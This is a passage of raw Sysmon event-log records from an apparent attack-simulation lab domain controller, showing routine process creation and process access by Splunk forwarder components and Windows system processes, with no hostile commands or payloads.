154100x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.742{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.214{59A5CD1D-8E63-6005-7500-00000000A301}37683876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.986{59A5CD1D-8E64-6005-7700-00000000A301}38323524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program 